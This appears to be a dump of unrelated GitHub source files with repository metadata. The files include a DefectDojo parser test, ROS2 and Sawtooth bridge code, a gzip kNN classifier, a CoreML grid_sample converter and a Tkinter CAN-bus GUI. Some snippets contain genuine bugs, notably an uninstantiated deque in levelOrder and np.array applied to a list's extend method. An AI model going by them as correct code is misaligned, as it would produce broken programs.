Test\r\n\r\n\r\nclass TestXanitizerParser(DojoTestCase):\r\n\r\n def test_parse_file_with_no_findings(self):\r\n testfile = open(\"unittests/scans/xanitizer/no-findings.xml\")\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(0, len(findings))\r\n\r\n def test_parse_file_with_one_findings(self):\r\n testfile = open(\"unittests/scans/xanitizer/one-findings.xml\")\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(1, len(findings))\r\n\r\n def test_parse_file_with_multiple_findings(self):\r\n testfile = open(\"unittests/scans/xanitizer/multiple-findings.xml\")\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(9, len(findings))\r\n finding = findings[5]\r\n self.assertEqual(1, len(finding.unsaved_vulnerability_ids))\r\n self.assertEqual(\"CVE-2015-5211\", finding.unsaved_vulnerability_ids[0])\r\n\r\n def test_parse_file_with_multiple_findings_no_details(self):\r\n testfile = open(\r\n get_unit_tests_path() + \"/scans/xanitizer/multiple-findings-no-details.xml\"\r\n )\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(9, len(findings))\r\n","repo_name":"DefectDojo/django-DefectDojo","sub_path":"unittests/tools/test_xanitizer_parser.py","file_name":"test_xanitizer_parser.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":3128,"dataset":"github-code","pt":"18"} +{"seq_id":"4665802658","text":"import argparse\nimport tensorflow as tf\n\ndef get_args():\n argparser = argparse.ArgumentParser(description=__doc__)\n argparser.add_argument(\n '-c', '--config',\n metavar='C',\n default='None',\n help='The Configuration file')\n args = argparser.parse_args()\n return args\n\ndef initialize_vocab(vocab_path):\n if tf.gfile.Exists(vocab_path):\n rev_vocab = []\n with tf.gfile.GFile(vocab_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip('\\n') for line in rev_vocab] # id, token\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)]) # token, id\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocab_path)\n\nif __name__ == '__main__':\n vocab_path = '../data/vocab.dat'\n vocab, rev_vocab = initialize_vocab(vocab_path)\n print(vocab['and'])\n","repo_name":"michael0905/cnn-text-classifier","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19522142824","text":"# coding: utf-8\n\nfrom cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\n\nclass StudentInfoPlugin(CMSPluginBase):\n name = u\"Списки студентов\"\n render_template = \"students/manager/index.html\"\n text_enabled = False\n allow_children = False\n\n\nplugin_pool.register_plugin(StudentInfoPlugin)","repo_name":"SevenLines/django-tealeaf","sub_path":"students/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10000594516","text":"import sys, argparse, os\nimport cPickle as pickle\n\n\ndef main(argv=None): # IGNORE:C0111\n '''Command line options.'''\n# print(\"Running run_particle!\")\n sys.stdout.flush()\n if argv is None:\n argv = sys.argv\n else:\n sys.argv.extend(argv)\n \n parser = argparse.ArgumentParser(description=\"Run single particle until result accepted.\")\n parser.add_argument(\"-i\", \"--input\", action=\"store\", dest=\"pickle_file\", required=True, help=\"Path and name of pickle file containing particle.\")\n parser.add_argument(\"-o\", \"--output\", action=\"store\", dest=\"result_file\", required=True, help=\"Path and name of file for output.\")\n args = parser.parse_args()\n \n pickle_file = args.pickle_file\n result_file = args.result_file\n \n print(\"\\nLoading particle (dev run_particle) ...\")\n if os.path.isfile(pickle_file):\n print(\"Reading pickle file ...\")\n f_in = open(pickle_file, 'r')\n particle = pickle.load(f_in)\n f_in.close()\n else:\n print(\"'{}' does not exist\".format(pickle_file)) \n sys.exit()\n \n print(\"Finding acceptable theta ...\")\n theta_accepted, ln_w, distance, proposed_theta_idx = particle.find_accepted_theta()\n print(\"... accepted theta.\")\n \n ## Write results to output file\n f_out = open(result_file, 'w')\n f_out.write(\"{}\\t{}\\t{}\\t{}\".format(\",\".join([str(int(theta)) for theta in theta_accepted]), str(ln_w), str(distance), str(proposed_theta_idx)))\n f_out.close()\n print(\"Printed results to file.\")\n \n \n\nif __name__ == \"__main__\":\n main()\n \n ","repo_name":"wbryant/ARBOC-COBRA","sub_path":"run_particle.py","file_name":"run_particle.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8478802434","text":"import rclpy\nfrom rclpy.node import Node\nfrom blockchain_bots_interfaces.srv import ConnectToSawtoothSim, SendCommandToSawtoothSim\nfrom .sawtoothClient import sawtoothClient\n\nclass Sawtooth(Node):\n \"\"\"A class to implement the bridge between ROS2 and Sawtooth.\n\n ...\n\n Description\n -----------\n A child class of the Node class. This node acts as the server for the 2 services \n (namely connect_to_sawtooth and send_command_to_sawtooth) that implement the bridge \n between the other ros2 nodes and the Sawtooth blockchain.\n\n Attributes\n ----------\n srv1 : rclpy.service.Service\n Service for connection with the python server in the sawtooth client docker container.\n srv2 : rclpy.service.Service\n Service to send commands to the connected sawtooth client docker container.\n\n\n Methods\n -------\n connect_to_sawtooth_callback(request, response):\n The callback that implements srv1\n send_command_to_sawtooth_callback (request, response):\n The callback that implements srv2\n \"\"\"\n\n def __init__(self):\n super().__init__('minimal_service')\n self.srv1 = self.create_service(ConnectToSawtoothSim, 'connect_to_sawtooth', self.connect_to_sawtooth_callback)\n self.srv2 = self.create_service(SendCommandToSawtoothSim, 'send_command_to_sawtooth', self.send_command_to_sawtooth_callback)\n \n def connect_to_sawtooth_callback (self, request, response):\n \"\"\"The callback that implements srv1\n\n ...\n\n Description\n -----------\n Given the host IP and the port it connects to the respective docker container \n using the custom made sawtoothClient class. Now one node handles the services \n from all the robots, the robot_id is used to create each instance.(TODO: Create\n one server node for each robot.)\n \"\"\"\n\n host = request.host\n port = request.port\n robot_id = request.robot_id\n if robot_id == 0:\n try:\n self.clientInstance0 = sawtoothClient(host,port)\n except:\n response.result = False\n return response\n else:\n try:\n self.clientInstance1 = sawtoothClient(host,port)\n except:\n response.result = False\n return response\n response.result = True\n self.get_logger().info('Connected to sawtooth client:\\nIP: %s:%d for robot_id %d' % (request.host, request.port, request.robot_id))\n\n return response\n \n def send_command_to_sawtooth_callback (self, request, response):\n \"\"\"The callback that implements srv2.\n\n ...\n\n Description\n -----------\n Based on the robot_id which calls srv2, a set, inc, show or list command is sent to the\n respective sawtooth-client docker container which in term requests the respective transaction\n from the IntKey TP. \n \"\"\"\n robot_id = request.robot_id\n\n if robot_id == 0: # Case for commands sent by 1st robot\n commandType = request.command_type\n stationNum = request.station_num\n value = request.value\n if commandType == \"set\":\n result = self.clientInstance0.sendSet(stationNum, value)\n elif commandType == \"inc\":\n result = self.clientInstance0.sendInc(stationNum, value)\n elif commandType == \"show\":\n result = self.clientInstance0.sendShow(stationNum)\n elif commandType == \"list\":\n result = self.clientInstance0.sendList()\n else:\n result = \"FALSE COMMAND\"\n else: # Case for commands sent by 2nd robot\n commandType = request.command_type\n stationNum = request.station_num\n value = request.value\n if commandType == \"set\":\n result = self.clientInstance1.sendSet(stationNum, value)\n elif commandType == \"inc\":\n result = self.clientInstance1.sendInc(stationNum, value)\n elif commandType == \"show\":\n result = self.clientInstance1.sendShow(stationNum)\n elif commandType == \"list\":\n result = self.clientInstance1.sendList()\n else:\n result = \"FALSE COMMAND\"\n self.get_logger().info('Transaction by robot_id: %d for commad:\\nCommand Type: %s, station%d, value: %d' % (robot_id, commandType, stationNum, value))\n self.get_logger().info('RESPONSE: %s' %(result))\n response.result = result\n return response\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n minimal_service = Sawtooth()\n\n rclpy.spin(minimal_service)\n\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"smarnakis/blockchain_bots","sub_path":"sawtooth_bridge/sawtooth_bridge/sawtooth_bridge_server.py","file_name":"sawtooth_bridge_server.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12006893451","text":"import collections\r\nfrom typing import List\r\n\r\n\r\nclass TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\nclass Solution:\r\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\r\n queue = collections.deque\r\n queue.append(root)\r\n ans = []\r\n while queue:\r\n size = len(queue)\r\n temp_node = []\r\n for _ in range(size):\r\n cur = queue.popleft()\r\n if not cur:\r\n continue\r\n temp_node.append(cur.val)\r\n queue.append(cur.left)\r\n queue.append(cur.right)\r\n if temp_node:\r\n ans.append(temp_node)\r\n return ans\r\n\r\n","repo_name":"longshirong/python","sub_path":"LeetCode/binaryTree/levelOrder.py","file_name":"levelOrder.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2732053214","text":"from memo import*\nfrom datetime import datetime\n\n\n\nwhile True:\n user = input('名前を入力してください')\n\n menus = ['登録:1','削除:2','編集:3','照会:4']\n for menu in menus:\n print(menu)\n selected_number = input('メニュー番号を選んでください')\n #メモの追加\n if selected_number == '1':\n memonaiyou = str(input('メモの内容を入力してください'))\n print('メモの内容:'+ memonaiyou)\n makeTime = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")\n makeTime = str(makeTime)\n print('作成\b日時:'+makeTime)\n createdata(user,memonaiyou, makeTime)\n\n\n #メモの削除\n elif selected_number == '2':\n index = input('削除したい番号を選んでください:')\n print('メモを削除しました。')\n\n #メモの照会\n elif selected_number == '3':\n memo.inquirydata()\n\n #メモの更新\n elif selected_number == '4':\n index = input('更新したいメモの番号を選んでください:')\n memo.update(memo_list,index)\n # やり直し\n else:\n print('不正な値が入力されました。')\n continue\n","repo_name":"genytoday/memo_project","sub_path":"memo_bl.py","file_name":"memo_bl.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18967219939","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 10 17:14:47 2019\r\n\r\n@author: wzy\r\n\"\"\"\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.utils import to_categorical\r\nfrom keras.callbacks import ModelCheckpoint\r\n\r\n\r\ndataset = datasets.load_iris()\r\nx = dataset.data\r\nY = dataset.target\r\nY_labels = to_categorical(Y, num_classes=3)\r\nseed = 4\r\nnp.random.seed(seed)\r\n\r\n\r\ndef create_model(optimizer='rmsprop', init='glorot_uniform'):\r\n model = Sequential()\r\n model.add(Dense(units=4, activation='relu', input_dim=4, kernel_initializer=init))\r\n model.add(Dense(units=6, activation='relu', kernel_initializer=init))\r\n model.add(Dense(units=3, activation='softmax', kernel_initializer=init))\r\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\r\n return model\r\n\r\n\r\nmodel = create_model()\r\n# 设置检查点\r\nfilepath = '../model/weights.best.h5'\r\ncheckpoint = ModelCheckpoint(filepath=filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\r\ncallback_list = [checkpoint]\r\nmodel.fit(x, Y_labels, validation_split=0.2, epochs=200, batch_size=5, verbose=0, callbacks=callback_list)\r\n# 加载最优权重到新的模型\r\nnew_model = create_model()\r\nnew_model.load_weights(filepath='../model/weights.best.h5')\r\nscores = new_model.evaluate(x, Y_labels, verbose=0)\r\nprint('%s: %.2f%%' % (new_model.metrics_names[1], scores[1]*100))\r\n\r\n","repo_name":"wzy6642/Deep_Learning_Keras","sub_path":"use_best_model/code/use_best_model.py","file_name":"use_best_model.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"5351101775","text":"# Parallel processing version of 1_2_nn_plus_gzip_fix-tie-breaking.ipynb\n# On a 2020 MacBook Air, it runs about 4 times faster ~1 iter/sec\n# than the non-parallel version (~4 iter/sec)\n\n# It should finish in about 2-3 h compared to ~12 h before\n\nfrom collections import Counter\nimport gzip\nimport multiprocessing as mp\nimport os.path as op\n\nfrom joblib import Parallel, delayed\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom local_dataset_utilities import download_dataset, load_dataset_into_to_dataframe, partition_dataset\n\n\ndef process_dataset_subset(df_train_subset, test_text, c_test_text, d):\n\n distances_to_test = []\n for row_train in df_train_subset.iterrows():\n index = row_train[0]\n train_text = row_train[1][\"text\"]\n c_train_text = d[index]\n\n train_plus_test = \" \".join([test_text, train_text])\n c_train_plus_test = len(gzip.compress(train_plus_test.encode()))\n\n ncd = ( (c_train_plus_test - min(c_train_text, c_test_text))\n / max(c_test_text, c_train_text) )\n\n distances_to_test.append(ncd)\n\n return distances_to_test\n\n\ndef divide_range_into_chunks(start, end, num_chunks):\n chunk_size = (end - start) // num_chunks\n ranges = [(i, i + chunk_size) for i in range(start, end, chunk_size)]\n ranges[-1] = (ranges[-1][0], end) # Ensure the last chunk includes the end\n return ranges\n\n\nif __name__ == '__main__':\n\n if not op.isfile(\"train.csv\") and not op.isfile(\"val.csv\") and not op.isfile(\"test.csv\"):\n download_dataset()\n\n df = load_dataset_into_to_dataframe()\n partition_dataset(df)\n\n df_train = pd.read_csv(\"train.csv\")\n df_val = pd.read_csv(\"val.csv\")\n df_test = pd.read_csv(\"test.csv\")\n\n num_processes = mp.cpu_count()\n k = 2\n predicted_classes = []\n\n start = 0\n end = df_train.shape[0]\n ranges = divide_range_into_chunks(start, end, num_chunks=num_processes)\n\n\n # caching compressed training examples\n d = {}\n for i, row_train in enumerate(df_train.iterrows()):\n train_text = row_train[1][\"text\"]\n train_label = row_train[1][\"label\"]\n c_train_text = len(gzip.compress(train_text.encode()))\n \n d[i] = c_train_text\n\n # main loop\n for row_test in tqdm(df_test.iterrows(), total=df_test.shape[0]):\n\n test_text = row_test[1][\"text\"]\n test_label = row_test[1][\"label\"]\n c_test_text = len(gzip.compress(test_text.encode()))\n all_train_distances_to_test = []\n\n # parallelize iteration over training set into num_processes chunks\n with Parallel(n_jobs=num_processes, backend=\"loky\") as parallel:\n\n results = parallel(\n delayed(process_dataset_subset)(df_train[range_start:range_end], test_text, c_test_text, d)\n for range_start, range_end in ranges\n )\n for p in results:\n all_train_distances_to_test.extend(p)\n\n sorted_idx = np.argsort(np.array(all_train_distances_to_test.extend))\n top_k_class = np.array(df_train[\"label\"])[sorted_idx[:k]]\n predicted_class = Counter(top_k_class).most_common()[0][0]\n\n predicted_classes.append(predicted_class)\n\n print(\"Accuracy:\", np.mean(np.array(predicted_classes) == df_test[\"label\"].values))","repo_name":"rasbt/nn_plus_gzip","sub_path":"1_2_caching-multiprocessing.py","file_name":"1_2_caching-multiprocessing.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"18"} +{"seq_id":"35780454402","text":"# 실버 4\n\nimport sys\n\ninput = sys.stdin.readline\n\n\ndef dfs(x, y):\n if shape == \"-\":\n nx, ny = x, y + 1\n else:\n nx, ny = x + 1, y\n\n if nx < n and ny < m and not visited[nx][ny] and floor[nx][ny] == shape:\n visited[nx][ny] = True\n dfs(nx, ny)\n\n\nn, m = map(int, input().split())\nfloor = [input().rstrip() for _ in range(n)]\nvisited = [[False] * m for _ in range(n)]\nresult = 0\n\nfor i in range(n):\n for j in range(m):\n if not visited[i][j]:\n visited[i][j] = True\n shape = floor[i][j]\n dfs(i, j)\n result += 1\n\nprint(result)\n","repo_name":"what-the-study/what-the-algorithm","sub_path":"youngjoo/BOJ/DFS_BFS/1388_바닥_장식.py","file_name":"1388_바닥_장식.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42110815168","text":"#!/usr/bin/env python3\n# This file extends the client in lib.network.client\nfrom lib.network.distributed_client import Client\nfrom configparser import SafeConfigParser\nfrom lib.card.card import Card\nfrom urllib.request import Request\nfrom urllib.request import urlopen\nfrom urllib.request import HTTPError\nimport socket\nimport time\nimport json\nimport re\n\n\nclass GathererClient(Client):\n __failstrs__ = [\"2cb5f52b7de8f981bbe74c8b81faf7a4\"]\n __tmplate__ = \"http://gatherer.wizards.com/Pages/Card/Details.aspx?multiverseid=%i\"\n __rsp__ = 'OK'\n\n def __init__(self, *args, **kwargs):\n Client.__init__(self, *args, **kwargs)\n self.__delay__ = 5\n self.__has_deck__ = False\n self.__data__ = b''\n self.__d_id__ = 0\n self.__sleep_flag__ = False\n\n def upkeep(self):\n if not self.__has_deck__:\n self.__conn__.send(\"NEXT\".encode())\n else:\n self.__conn__.send((\"OKAY %i\" % len(self.__data__)).encode())\n\n def handle(self, m):\n m = m.split(' ', 1)\n\n if m[0] == 'PAGEID':\n self.__d_id__ = int(m[1])\n text = \"\"\n try:\n text = str(urlopen(Request((self.__tmplate__ % self.__d_id__))\n ).read(), \"utf-8\")\n print(\"GOT CARD %i\" % (self.__d_id__))\n text = re.sub(r'\\xe2', '-', text)\n# print(text)\n c = Card(None)\n c.loadFromGatherer(text)\n print(c.export())\n self.__data__ = json.dumps(c.export()).encode()\n self.__has_deck__ = True\n\n except HTTPError:\n self.__conn__.send((\"FAIL %i\" % self.__d_id__).encode())\n print(\"FAILED CARD ID %i, REDIRECT\" % self.__d_id__)\n return\n\n except RuntimeError as e:\n msg = \"FAILED TO PARSE DECK, '%s'\" % str(e)\n self.__conn__.send((\"FAIL %i %s\" % (self.__d_id__,\n msg).encode()))\n print(msg)\n return\n\n except Exception as e:\n print(e)\n self.__conn__.send((\"FATAL %s\" % str(e)).encode())\n self.__conn__.close()\n self.join()\n\n elif m[0] == 'GOAHEAD':\n print(\"GOT GOAHEAD SIGNAL\")\n print(self.__data__)\n self.__conn__.send(self.__data__)\n\n elif m[0] == '1':\n print(\"UPLOADED CARD %7i\" % (self.__d_id__))\n self.__has_deck__ = False\n self.__sleep_flag__ = True\n\n elif m[0] == '0':\n print(\"ERROR UPLOADING DECK %i CONTINUING....\" % self.__d_id__)\n\n elif m[0] == 'RECONNECT':\n HOST, PORT = self.__conn__.getpeername(), 9001\n self.__conn__.close()\n time.sleep(int(m[1]))\n self.__conn__ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.__conn__.bind((HOST, PORT))\n\n elif m[0] == 'DONE':\n print(\"RECIEVED DONE SIGNAL FROM SERVER\")\n self.__conn__.close()\n self.join()\n\n if(self.__sleep_flag__):\n time.sleep(self.__delay__)\n self.__sleep_flag__ = False\n\nif __name__ == \"__main__\" or 1:\n parser = SafeConfigParser()\n parser.read('/u/reid/OpenSourcerer/settings.ini')\n\n client = GathererClient(parser.get('scrape', 'master'),\n int(parser.get('scrape', 'port')),\n )\n client.daemon = False\n client.run()\n\n","repo_name":"arrdem/OpenSourcerer","sub_path":"gatherer_client.py","file_name":"gatherer_client.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"37669611638","text":"import argparse\nimport shutil\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport coremltools\n\nCOREMLTOOLS_SUPPORTED_VERSION = '4.1'\n\nassert coremltools.__version__ == COREMLTOOLS_SUPPORTED_VERSION, \\\n f\"Please install coremltools version {COREMLTOOLS_SUPPORTED_VERSION}: \" + \\\n f\"`python3 -m pip uninstall coremltools && python3 -m pip install coremltools==={COREMLTOOLS_SUPPORTED_VERSION}`\\n\" + \\\n f\"current version: {coremltools.__version__}\"\n\nfrom coremltools.converters.mil.mil import Builder as mb\nimport coremltools.proto.FeatureTypes_pb2 as ft\nfrom coremltools.converters.mil.mil.ops.defs._op_reqs import (\n register_op, Operation, InputSpec, TensorInputType, IntInputType, BoolInputType,\n types\n)\nfrom coremltools.converters.mil.frontend.torch.ops import (\n _get_inputs as mil_get_inputs\n)\nfrom coremltools.converters.mil.backend.nn.op_mapping import (\n make_input\n)\nfrom coremltools.converters.mil import (\n register_torch_op\n)\nfrom coremltools.converters.mil.backend.nn.mil_to_nn_mapping_registry import (\n register_mil_to_nn_mapping\n)\n\n@register_mil_to_nn_mapping(override=True)\ndef grid_sample(const_context, builder, op):\n image_name = make_input(const_context, builder, op.input)\n grid_name = make_input(const_context, builder, op.grid)\n out_name = op.outputs[0].name\n\n suffix = \"_prepared\"\n input_names1 = [grid_name]\n out_names1 = [out_name + suffix]\n\n input_names2 = [image_name, out_names1[0]]\n out_names2 = [out_name]\n\n # transpose the grid to [n, 2, w, h] shape (for encoding it to a coreml 2-channel texture)\n builder.add_transpose(\n name=op.name + suffix,\n axes=(0, 3, 1, 2),\n input_name=input_names1[0],\n output_name=out_names1[0],\n )\n spec_layer = builder._add_generic_layer(op.name, input_names2, out_names2)\n\n spec_layer_params = spec_layer.custom\n spec_layer_params.className = \"GridSampleLayer\"\n \n@register_op(doc_str=\"\")\nclass grid_sample(Operation):\n \n input_spec = InputSpec(\n input=TensorInputType(),\n grid=TensorInputType(),\n mode=IntInputType(const=True),\n padding_mode=IntInputType(const=True),\n align_corners=BoolInputType(const=True),\n )\n\n bindings = {\n \"class_name\": \"grid_sample\",\n \"input_order\": [\"input\", \"grid\"],\n \"parameters\": [\"mode\", \"padding_mode\", \"align_corners\"],\n \"description\": \"PyTorch grid_sample\",\n }\n\n def __init__(self, **kwargs):\n super(grid_sample, self).__init__(**kwargs)\n\n def type_inference(self):\n input_type = self.input.dtype\n ret_shape = self.input.shape\n return types.tensor(input_type, ret_shape)\n\n@register_torch_op(torch_alias=[\"grid_sampler\"], override=True)\ndef torch_grid_sample(context, node):\n inputs = mil_get_inputs(context, node, expected=5)\n res = mb.grid_sample(\n input=inputs[0], \n grid=inputs[1], \n mode=inputs[2], \n padding_mode=inputs[3], \n align_corners=inputs[4],\n name=node.name\n )\n context.add(res)\n\n\n########################################################################\n######################## Test ml model #################################\n########################################################################\n\nIN_WH = 512\nGRID_WH = 256\n\nclass TestModel(nn.Module):\n\n def forward(self, x, grid):\n grid_resized = self.resize_grid(grid)\n return F.grid_sample(\n x, grid_resized\n )\n\n def resize_grid(self, grid):\n # [1, GRID_WH, GRID_WH, 2] => [1, 2, GRID_WH, GRID_WH]\n grid_resized = grid.permute(0, 3, 1, 2)\n # [1, 2, GRID_WH, GRID_WH] => [1, 2, IN_WH, IN_WH]\n grid_resized = F.interpolate(\n grid_resized, \n size=(IN_WH, IN_WH), \n mode='nearest'\n )\n # [1, 2, IN_WH, IN_WH] => [1, IN_WH, IN_WH, 2]\n grid_resized = grid_resized.permute(0, 2, 3, 1)\n return grid_resized\n\n########################################################################\n########################################################################\n\ndef convert(output_path):\n torch_model = TestModel()\n example_input = torch.rand(1, 3, IN_WH, IN_WH) \n example_grid = torch.rand(1, GRID_WH, GRID_WH, 2) \n traced_model = torch.jit.trace(torch_model, (example_input, example_grid))\n\n mlmodel = coremltools.convert(\n traced_model,\n inputs=[\n coremltools.ImageType(name=\"image_input\", shape=example_input.shape), \n coremltools.TensorType(name=\"warp_grid\", shape=example_grid.shape)\n ],\n minimum_deployment_target=coremltools.target[\"iOS13\"]\n )\n mlmodel_path = output_path + \".mlmodel\"\n mlmodel.save(mlmodel_path)\n\n spec = coremltools.utils.load_spec(mlmodel_path)\n\n output_layer = spec.description.output[0]\n output_layer.type.imageType.colorSpace = ft.ImageFeatureType.RGB\n output_layer.type.imageType.height, output_layer.type.imageType.width = IN_WH, IN_WH\n coremltools.utils.rename_feature(spec, output_layer.name, 'output')\n\n coremltools.utils.save_spec(spec, mlmodel_path)\n\n shutil.copyfile(mlmodel_path, output_path)\n\n print(f\"Saved to {output_path}\")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-o', '--output', \n default='./TorchCoreMLDemo/TorchCoreMLDemo/Assets/model.pb', \n help='Output file'\n )\n args = parser.parse_args()\n convert(args.output)\n\nif __name__ == \"__main__\":\n main()","repo_name":"dneprDroid/pytorch-coreml-custom-layer-example","sub_path":"Convert/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"18635166434","text":"from tkinter import *\nimport can\nimport struct\nimport serial\nimport time\n\nroot = Tk()\n\nroot.geometry(\"480x370\") # (\"width x height\").\nroot.minsize(480,370) # (width, height)\nroot.maxsize(480, 480)\n# root.configure(bg=\"white\")\n\nroot.title(\"TEMP CONTROL CARD GUI\")\n\nSETPOINT = IntVar()\nTEMP = StringVar()\nSTATE = StringVar()\nSWITCH_STATE = StringVar()\nSWITCH_STATE.set(\"STATE IS OFF!\")\n\nSETPOINT_R = IntVar()\nSTATE_R = IntVar()\nTEMP_R = StringVar()\nSTATE_R = StringVar()\n\nport = serial.Serial(port='/dev/ttyACM0')\n\nglobal SW_STATE\nSW_STATE = False\n\n# ///////////////////////////////////////////////////////////////////////////////////////////////\n\ndef read_temp_callback(): # currently it is printing the data that is in the stack of the serial buffer not the latest one..\n\n data_serial = port.readline().decode().rstrip() # Read a line of data from the serial port and decode it\n # print(data_serial)\n if \"TEMP:\" in data_serial:\n data_array = data_serial.split(\" \")\n # print(data_array[1])\n TEMP_R.set(f\"Temperature: {data_array[1]}\")\n \n # print(data_array[4])\n STATE_R.set(f\"State: {data_array[4]}\")\n\n # print(data_array[7])\n SETPOINT_R.set(F\"Setpoint: {data_array[7]}\")\n\n root.after(10, read_temp_callback)\n # break \n\n\n\n# ////////////////////////////////////////////////////////////////////////////////////////////////\n\ndef setpoint_button_callback():\n # sending the setpoint\n # print(STATE.get())\n T = float(SETPOINT.get())\n # print(type(T))\n # print(T)\n byte_arr = bytearray(struct.pack(\"f\", float(T)))\n\n bus = can.interface.Bus(channel='can0', bustype='socketcan')\n can_msg = can.Message(arbitration_id = 0x110,\n data = [0, 0, byte_arr[0], byte_arr[1], byte_arr[2], byte_arr[3], 0, 0],\n is_extended_id = False)\n bus.send(can_msg)\n bus.shutdown()\n\n\ndef state_button_callback():\n # print(SETPOINT.get())\n\n global SW_STATE\n print(\"callback funcf. called.\")\n if (SW_STATE == True):\n SW_STATE = False\n SWITCH_STATE.set(\"STATE IS OFF!\")\n # print(\" state is OFF\")\n else:\n SW_STATE = True\n SWITCH_STATE.set(\"STATE IS ON! \")\n # print(\" state is ON\")\n\n if(SW_STATE == True):\n bus = can.interface.Bus(channel='can0', bustype='socketcan')\n can_msg = can.Message(arbitration_id = 0x104,\n data = [1, 0, 0, 0, 0, 0, 0, 0],\n is_extended_id = False)\n bus.send(can_msg)\n bus.shutdown()\n\n if(SW_STATE == False):\n bus = can.interface.Bus(channel='can0', bustype='socketcan')\n can_msg = can.Message(arbitration_id = 0x104,\n data = [0, 0, 0, 0, 0, 0, 0, 0],\n is_extended_id = False)\n bus.send(can_msg)\n bus.shutdown()\n\n# //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\nlabel1 = Label(text = \"Morphle\", bg = \"purple\", fg = \"white\", padx= 204, pady = 4, font = (\"calibri\", 12, \"bold\")).grid(columnspan=3)\n\nSTATE_LABEL = Label (root, text=\"STATE\", padx = 0, pady = 2, border = 10) .grid(row=1, column=0)\nSETPOINT_LABEL = Label (root, text=\"SETPOINT\", padx = 0, pady = 2, border = 10) .grid(row=2, column=0)\n\nGAP1 = Label (root, text=\"\", pady=10) .grid(row=3, columnspan=3)\nTEMP_STATUS_TITLE = Label (root, text=\"TEMPERATURE\", bg = \"grey\", padx = 166, pady = 4) .grid(row=4, columnspan=3)\nTEMP_STATUS_BAR = Label (root, textvariable = TEMP_R, bg = \"white\",fg=\"grey\", padx = 82, pady = 4, border = 2, font=(\" \", 14, \"bold\")) .grid(row=5, columnspan=3)\n\nGAP2 = Label (root, text=\"\", pady=0) .grid(row=6, columnspan=3)\nSTATE_STATUS_TITLE = Label (root, text=\"CURRENT STATE\", bg = \"grey\", padx = 160, pady = 4) .grid(row=7, columnspan=3)\nSTATE_STATUS_BAR = Label (root, textvariable = STATE_R, bg = \"white\", padx = 188, pady = 4, border = 2) .grid(row=8, columnspan=3)\n\nGAP3 = Label (root, text=\"\", pady=0) .grid(row=9, columnspan=3)\nSETPOINT_STATUS_TITLE = Label (root, text=\"CURRENT SETPOINT\", bg = \"grey\", padx = 148, pady = 4) .grid(row=10, columnspan=3)\nSETPOINT_STATUS_BAR = Label (root, textvariable = SETPOINT_R, bg = \"white\", padx = 174, pady = 4, border = 2) .grid(row=11, columnspan=3)\n\nSETPOINT_ENTRY = Entry (root, textvariable = SETPOINT) .grid(row=2, column=1)\n\nSTATE_BUTTON = Button (root, textvariable=SWITCH_STATE, command = state_button_callback, padx=104) .grid(row=1, column=1, columnspan=2)\nSETPOINT_BUTTON = Button (root, text=\"SET\", command = setpoint_button_callback, padx=30) .grid(row=2, column=2)\n# READ_TEMP_BUTTON = Button (root, text=\"READ TEMPERATURE\", command = read_temp_callback, border = 2) .grid(row=6, columnspan=3)\n\nroot.after(1000, read_temp_callback)\n \nroot.mainloop()\n\n\n# ================================================ AUTHOR: RAJAT 